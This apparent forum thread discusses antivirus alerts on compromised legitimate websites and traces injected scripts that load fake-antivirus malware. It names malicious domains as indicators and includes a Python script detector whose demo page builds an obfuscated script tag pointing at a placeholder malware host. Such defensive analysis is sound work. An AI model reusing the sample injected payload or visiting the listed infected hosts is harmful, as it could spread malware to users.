false positive, html:script-inf a little too broad?

I have several warnings from client machines that perfectly legit websites are infected by html:script-inf.

the latest one is this:
: File “hxxp://advisor.morningstar.com/microsite/default.aspx?client=cambridge” is infected by “HTML:Script-inf” virus.
“Resident protection (Web Shield)” task used Version of current VPS file is 110330-0, 03/30/2011

Is there something bad about that site, or is a script just causing avast to freak because it’s redirecting or something?

I wish there was a way to just whitelist “html:script-inf” and the other ones that seem way too broad (html:iframe-inf, win32:malware-gen). Some previous examples that seem to come and go:

  1. d:\autorun.inf on a factory stamped Office 2000 CD. Surely the non-writable factory CD is infected with the inf:autorun worm
  2. File “hyyp://www.inventorshelp.com/index.php?option=com_contact&view=contact&id=1&Itemid=72” is infected by “JS:Redirector-DC [Trj]” virus
  3. File “C:\Documents and Settings\All Users\Application Data\Adobe\Acrobat\9.2\ARM\Elevator.exe” is infected by “Win32:Malware-gen”
  4. basically anything on photobucket, html:script-inf
  5. File “hzzp://my.yahoo.com/” is infected by "HTML:Script-inf

But the only one I really care about right now is our client trying to get to morningstar.com; it being an investment site, you can imagine they’re panicking about it being a virus site now.

Please munge the live links you give so that the unaware won’t get infected, either by putting htxp or wxw etc.

The JS-redirector flag is still found by many av solutions and not only by avast:
just scanned here: htxp://www.inventorshelp.com/index.php?option=com_contact&view=contact&id=1&Itemid=72
Sitesecurity check at sucuri finds: http://sucuri.net/malware/entry/MW:JS:445
and 7 instances of it, see: http://sucuri.net/malware/malware-entry-mwjs445

Update your joomla version:

Web application details:
Application: Joomla! 1.5 - Open Source Content Management - http://www.joomla.org

Web application version:
Joomla Version 1.5.8 to 1.5.14 for: htxp://www.inventorshelp.com//media/system/js/caption.js
Joomla Version 1.5.2 to 1.5.7 for: hxtp://www.inventorshelp.com//language/en-GB/en-GB.ini

This website is qualified as dangerous here: http://www.websecurityguard.com/detail.aspx?domain=inventorshelpline.com&url=inventorshelp.com

polonus

Thanks for the info on inventorshelp.

What’s going on with the first link, morningstar dot com?

Going forward, how are you scanning these sites? I’d like to add that tool/knowledge to my bag of tricks too :slight_smile:

Hi ByronTRN :slight_smile:

Please can you modify the link, to prevent others potentially becoming infected. (change http to hXXp) Thanks.

For the morningstar link, it seems that avast is alerting on a script that points to a php file on a site that avast blocks (network shield blocks a direct connection)

This script occurs 3 times within the page.

Whether the detection on the site it links to is good or not I don’t know.

The site it links to appears to be down, however avast still blocks the attempt to connect.

Scott

VirusTotal URL scan - inventorshelp.com/
http://www.virustotal.com/url-scan/report.html?id=a76827a3bc7438fa095bdc6c1924b364-1301489189

VirusTotal HTML scan - inventorshelp.com/
http://www.virustotal.com/file-scan/report.html?id=1b7d129e2414a750737d0b11818871ceac1c6643bfd81e955bc11712160e5f8b-1301496392

I’m just trying to understand…

On the inventorshelp site, you said sucuri says this:
Malware entry: MW:JS:445
Description: This encoded javascript loads malware (the fake AV) from:
*.ars3000.serveblog.net/ml.php (and other domains)

I want to know where on inventorshelp actually loads that malware.

Or is it because inventorshelp mentions joomla’s homepage at the very bottom, basically saying joomla is used on parts of the site… and maybe joomla’s homepage actually loads the malware?

I don’t get any attempted infections when browsing around inventorshelp - it seems to be a pretty legit site anyway; I’m just trying to see how the flow is when it comes to detections. Does avast check every link 3 levels deep or something? (inventorshelp mentioned joomla, so go scan joomla, which mentions about 400 other random urls, so go check them all - if one is infected then inventorshelp must be infected?)

Wow - this same client machine is now emailing me about being infected with the rogue-av…

And since you see the lizamoon link on your end, that means it’s embedded in the morningstar site… right?

How can such a legit company be so infected? Should I tell them?

For the inventorshelp site, it seems that avast is alerting on a long 1 line script that occurs twice in the page.

Thanks for the additional info on inventorshelp - are you just looking at the view-source, or is there an avast utility that can highlight what it thinks is infected?

I can’t tell what that script even does; avast just doesn’t like the length?

I am using a couple of tools…that is just a notepad++ window after I have pulled the source code. Then I isolate sections to find what avast is alerting on.

Using another tool, it appears that all that code returns a script that points to another site (avast will alert on this unobfuscated script as well). What is happening from there I don’t know.

I can’t seem to get any of the sites to resolve properly…Could be because I am trying in ubuntu?

EDIT: Pol, one of your links is one of the possibly infected ones and is live :wink:
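The kind of check Scott describes (pull the source, isolate the long one-line script, decode it to see the URL it points at) done in Python, as an added example that is not code from anyone in this thread. The sample page, the placeholder host name and the charcode/hex encoding it uses are all constructed for the demonstration.

```python
import re

# <script> bodies, two common obfuscation idioms, and plain http(s) URLs.
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
HEX_ESC_RE = re.compile(r"(?:\\x|%)([0-9a-fA-F]{2})")
URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w./?=&%\-]*)?", re.I)

def decode_layer(text):
    """Undo one layer: String.fromCharCode(n,n,...) lists and \\xNN / %NN escapes."""
    text = CHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), text)
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), text)

def unobfuscate(text, max_layers=5):
    """Peel nested layers until the text stops changing (bounded, so it always ends)."""
    for _ in range(max_layers):
        decoded = decode_layer(text)
        if decoded == text:
            break
        text = decoded
    return text

def suspicious_scripts(html, min_len=200):
    """Flag script blocks that are one very long line or use charcode/hex escapes and
    list the URLs visible after decoding. Caveat: minified legit scripts, or a %NN in a
    query string, also trigger; hits are leads to inspect, not verdicts."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1).strip()
        one_line = "\n" not in body and len(body) >= min_len
        if one_line or CHARCODE_RE.search(body) or HEX_ESC_RE.search(body):
            decoded = unobfuscate(body)
            findings.append({"length": len(body), "one_line": one_line,
                             "urls": sorted(set(URL_RE.findall(decoded)))})
    return findings

# Constructed sample page: a harmless two-line script plus an injected one-liner that
# hex-escapes a fromCharCode call writing a <script src> tag (placeholder host, not a real IoC).
PAYLOAD = '<script src="http://malware-host.example/ml.php"></script>'
INNER = "document.write(String.fromCharCode(%s))" % ",".join(str(ord(c)) for c in PAYLOAD)
OUTER = 'eval(unescape("%s"))' % "".join("%%%02x" % ord(c) for c in INNER)
SAMPLE_HTML = """<html><body>
<script>
  var x = 1;
  document.getElementById("a").innerText = x;
</script>
<script>%s</script>
</body></html>""" % OUTER
```

Feed `suspicious_scripts()` the page source saved from view-source rather than letting a browser run it; each hit carries the decoded URLs, which is what to compare against the blocked-site reports mentioned in this thread.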

Hi bryonTRN,

Here you can get a hunch on the malware infection at inventorshelp.com/
look at the active screen image I attached for you,

polonus

P.S. Ta, my friend, have made it non-click-through,

pol

Yes, I found that too and the domain is in Russia.

@ bryonTRN
I guess you aren’t questioning the avast web shields sensitivity now ;D

Legit web sites are no guarantee of being clean and the bigger/more popular the greater the target for hackers.

@ I can’t seem to get any of the sites to resolve properly…Could be because I am trying in ubuntu?

Well, I think DNS is DNS - resolution of names won’t be dependent on the OS.

Now I see how that long script is really a URL, amazing to me. That site (inventorshelp) should have nothing to do with a php file served from servemp3 dot com…

How does this stuff even happen, just poorly set permissions on people’s website files?

BTW, I have nothing to do with creating or securing websites; I’m just receiving alerts from our clients’ antiviruses.

Wow - I guess I assumed the bigger the website, the more SECURE it would be… and found it laughable that for example my.yahoo.com would be infected.

Now I can see how involved it gets - yahoo probably doesn’t check all the advertisements they load, and the advertisers probably swap out scripts a day or two after for something more malicious.

Should I even tell morningstar or inventorshelp, or would they not care / not believe me?

Hi bryonTRN

Another random example of such a hack as for inventorshelp.com is being discussed here: http://www.webhostingtalk.com/archive/index.php/t-998435.html and finally the joomla insecurities…

Take it from me it is happening all of the time, mostly short-lived but then others pop up like hydra-heads…

And you weren’t alone as you will find described here:
http://www.spywareinfoforum.com/index.php?/topic/131491-28000-urls-whacked/

polonus

If anything, a bigger site is a bigger target…and things like older management systems like wordpress etc… contribute to the infections…generally when you see updates for things like that it is (at least in part) for a security update.

@ I can't seem to get any of the sites to resolve properly...Could be because I am trying in ubuntu?
I meant the sites that the scripts point to. I have read that some are coded to only work in windows...similar to how some malware can detect when being run in a VM...

You can try and let the site owners know, and even send the link to this thread.

@ bryonTRN
Well, my.yahoo.com opened just fine for me (no alert); my.yahoo.com is different based on a) if you have a Yahoo account and b) geographic location, etc.

If you have an account, you are redirected to your account default page; for me that is home.bt.yahoo.com and I don’t get an alert.

So unless you haven’t got a Yahoo account you shouldn’t end up at my.yahoo.com, I would have thought.

Hi DavidR,

if I were bryonTRN, I would do an additional spyware scan; quote from the link I gave above:

this was done via FTP transfer with the account user and pass.

It happened to a few of my clients, weeks after I gave them the cpanel password; as they are local clients and I developed their websites, I keep all the passwords and tell them the password only if they ask me or need it.

Your computer or your client’s computer is infected with some kind of spyware, and probably the passwords were kept in txt files.

I also recommend saving your passwords in a free program like KeePass Password Safe.

polonus

Last week I got alerts from about 20% of our installed clients, all referencing my.yahoo.com (from my first post in this thread) - so yeah, not sure what they were seeing, but it seems to have gone away after the next updated virus defs.

So - what can be done about these rogue AV infections coming from perfectly legit websites? Can’t really block the referenced URLs they point to because they’re recreated through automated processes… I mean there has to be a money trail, is there anyone even trying to stop them?

I’d bet there’s probably 10-20 actual humans behind all the various fake-av clones out there, why not just take them down? (not to derail the thread or anything)

Well avast’s web shield has blocked those script-inf attempts to infect for those sites that we have given information on. Avast is by far ahead of the game on these detections compared to others, but nothing is going to be 100%. So everyone should have a backup and recovery strategy for when things do happen, be that system problems or malware.

So all you can do is investigate the fact that avast is alerting, learn how we have found out that the detections are good (or otherwise), and that avoids having to wait for us to check it out.

They aren’t what I would consider human, but organised crime, as it is all about money: fake AV reports you are infected and wants you to buy the solution. Guess what, if a user actually hands over money, these leeches could likely subject them to card/identity fraud also.